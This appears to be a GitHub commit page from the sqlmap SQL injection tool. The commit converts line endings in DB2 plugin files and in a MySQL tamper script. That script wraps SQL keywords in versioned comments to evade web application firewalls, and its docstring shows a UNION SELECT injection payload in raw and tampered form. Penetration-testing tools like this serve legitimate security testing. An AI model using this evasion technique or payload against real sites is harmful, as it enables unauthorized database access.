Permalink
Browse files

Replacing CRLF with LF in rest of files

  • Loading branch information...
stamparm committed Dec 26, 2012
1 parent eea249c commit 8b7cbe03b04331f9ae224aecac8aadea6c7f68d7
@@ -1,34 +1,34 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-from lib.core.enums import DBMS
-from lib.core.settings import DB2_SYSTEM_DBS
-from lib.core.unescaper import unescaper
-
-from plugins.dbms.db2.enumeration import Enumeration
-from plugins.dbms.db2.filesystem import Filesystem
-from plugins.dbms.db2.fingerprint import Fingerprint
-from plugins.dbms.db2.syntax import Syntax
-from plugins.dbms.db2.takeover import Takeover
-from plugins.generic.misc import Miscellaneous
-
-class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
- """
- This class defines DB2 methods
- """
-
- def __init__(self):
- self.excludeDbsList = DB2_SYSTEM_DBS
-
- Syntax.__init__(self)
- Fingerprint.__init__(self)
- Enumeration.__init__(self)
- Filesystem.__init__(self)
- Miscellaneous.__init__(self)
- Takeover.__init__(self)
-
- unescaper[DBMS.DB2] = Syntax.unescape
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import DBMS
+from lib.core.settings import DB2_SYSTEM_DBS
+from lib.core.unescaper import unescaper
+
+from plugins.dbms.db2.enumeration import Enumeration
+from plugins.dbms.db2.filesystem import Filesystem
+from plugins.dbms.db2.fingerprint import Fingerprint
+from plugins.dbms.db2.syntax import Syntax
+from plugins.dbms.db2.takeover import Takeover
+from plugins.generic.misc import Miscellaneous
+
+class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+ """
+ This class defines DB2 methods
+ """
+
+ def __init__(self):
+ self.excludeDbsList = DB2_SYSTEM_DBS
+
+ Syntax.__init__(self)
+ Fingerprint.__init__(self)
+ Enumeration.__init__(self)
+ Filesystem.__init__(self)
+ Miscellaneous.__init__(self)
+ Takeover.__init__(self)
+
+ unescaper[DBMS.DB2] = Syntax.unescape
@@ -1,20 +1,20 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-
-from lib.core.data import logger
-from plugins.generic.enumeration import Enumeration as GenericEnumeration
-
-class Enumeration(GenericEnumeration):
- def __init__(self):
- GenericEnumeration.__init__(self)
-
- def getPasswordHashes(self):
- warnMsg = "on DB2 it is not possible to list password hashes"
- logger.warn(warnMsg)
-
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+
+from lib.core.data import logger
+from plugins.generic.enumeration import Enumeration as GenericEnumeration
+
+class Enumeration(GenericEnumeration):
+ def __init__(self):
+ GenericEnumeration.__init__(self)
+
+ def getPasswordHashes(self):
+ warnMsg = "on DB2 it is not possible to list password hashes"
+ logger.warn(warnMsg)
+
return {}
View
@@ -1,69 +1,69 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-from lib.core.data import logger
-from lib.core.exception import SqlmapSyntaxException
-from plugins.generic.syntax import Syntax as GenericSyntax
-
-class Syntax(GenericSyntax):
- def __init__(self):
- GenericSyntax.__init__(self)
-
- @staticmethod
- def unescape(expression, quote=True):
- if quote:
- while True:
- index = expression.find("'")
- if index == -1:
- break
-
- firstIndex = index + 1
- index = expression[firstIndex:].find("'")
-
- if index == -1:
- raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
-
- lastIndex = firstIndex + index
- old = "'%s'" % expression[firstIndex:lastIndex]
- unescaped = ""
-
- for i in xrange(firstIndex, lastIndex):
- unescaped += "CHR(%d)" % (ord(expression[i]))
- if i < lastIndex - 1:
- unescaped += "||"
-
- expression = expression.replace(old, unescaped)
- else:
- expression = "||".join("CHR(%d)" % ord(c) for c in expression)
-
- return expression
-
- @staticmethod
- def escape(expression):
- logMsg = "escaping %s" % expression
- logger.info(logMsg)
- while True:
- index = expression.find("CHR(")
- if index == -1:
- break
-
- firstIndex = index
- index = expression[firstIndex:].find(")")
-
- if index == -1:
- raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
-
- lastIndex = firstIndex + index + 1
- old = expression[firstIndex:lastIndex]
- oldUpper = old.upper()
- oldUpper = oldUpper.lstrip("CHR(").rstrip(")")
- oldUpper = oldUpper.split("||")
-
- escaped = "'%s'" % "".join(chr(int(char)) for char in oldUpper)
- expression = expression.replace(old, escaped)
-
- return expression
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.data import logger
+from lib.core.exception import SqlmapSyntaxException
+from plugins.generic.syntax import Syntax as GenericSyntax
+
+class Syntax(GenericSyntax):
+ def __init__(self):
+ GenericSyntax.__init__(self)
+
+ @staticmethod
+ def unescape(expression, quote=True):
+ if quote:
+ while True:
+ index = expression.find("'")
+ if index == -1:
+ break
+
+ firstIndex = index + 1
+ index = expression[firstIndex:].find("'")
+
+ if index == -1:
+ raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
+
+ lastIndex = firstIndex + index
+ old = "'%s'" % expression[firstIndex:lastIndex]
+ unescaped = ""
+
+ for i in xrange(firstIndex, lastIndex):
+ unescaped += "CHR(%d)" % (ord(expression[i]))
+ if i < lastIndex - 1:
+ unescaped += "||"
+
+ expression = expression.replace(old, unescaped)
+ else:
+ expression = "||".join("CHR(%d)" % ord(c) for c in expression)
+
+ return expression
+
+ @staticmethod
+ def escape(expression):
+ logMsg = "escaping %s" % expression
+ logger.info(logMsg)
+ while True:
+ index = expression.find("CHR(")
+ if index == -1:
+ break
+
+ firstIndex = index
+ index = expression[firstIndex:].find(")")
+
+ if index == -1:
+ raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
+
+ lastIndex = firstIndex + index + 1
+ old = expression[firstIndex:lastIndex]
+ oldUpper = old.upper()
+ oldUpper = oldUpper.lstrip("CHR(").rstrip(")")
+ oldUpper = oldUpper.split("||")
+
+ escaped = "'%s'" % "".join(chr(int(char)) for char in oldUpper)
+ expression = expression.replace(old, escaped)
+
+ return expression
@@ -1,56 +1,56 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-import os
-import re
-
-from lib.core.common import singleTimeWarnMessage
-from lib.core.data import kb
-from lib.core.enums import DBMS
-from lib.core.enums import PRIORITY
-from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
-
-__priority__ = PRIORITY.HIGHER
-
-def dependencies():
- singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
-
-def tamper(payload, **kwargs):
- """
- Adds versioned MySQL comment before each keyword
-
- Example:
- * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
- * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
-
- Requirement:
- * MySQL < 5.1
-
- Tested against:
- * MySQL 4.0.18, 5.0.22
-
- Notes:
- * Useful to bypass several web application firewalls when the
- back-end database management system is MySQL
- * Used during the ModSecurity SQL injection challenge,
- http://modsecurity.org/demo/challenge.html
- """
-
- def process(match):
- word = match.group('word')
- if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
- return match.group().replace(word, "/*!0%s" % word)
- else:
- return match.group()
-
- retVal = payload
-
- if payload:
- retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
- retVal = retVal.replace(" /*!0", "/*!0")
-
- return retVal
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import re
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.data import kb
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
+
+def tamper(payload, **kwargs):
+ """
+ Adds versioned MySQL comment before each keyword
+
+ Example:
+ * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
+ * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
+
+ Requirement:
+ * MySQL < 5.1
+
+ Tested against:
+ * MySQL 4.0.18, 5.0.22
+
+ Notes:
+ * Useful to bypass several web application firewalls when the
+ back-end database management system is MySQL
+ * Used during the ModSecurity SQL injection challenge,
+ http://modsecurity.org/demo/challenge.html
+ """
+
+ def process(match):
+ word = match.group('word')
+ if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
+ return match.group().replace(word, "/*!0%s" % word)
+ else:
+ return match.group()
+
+ retVal = payload
+
+ if payload:
+ retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
+ retVal = retVal.replace(" /*!0", "/*!0")
+
+ return retVal
Oops, something went wrong.

0 comments on commit 8b7cbe0

Please sign in to comment.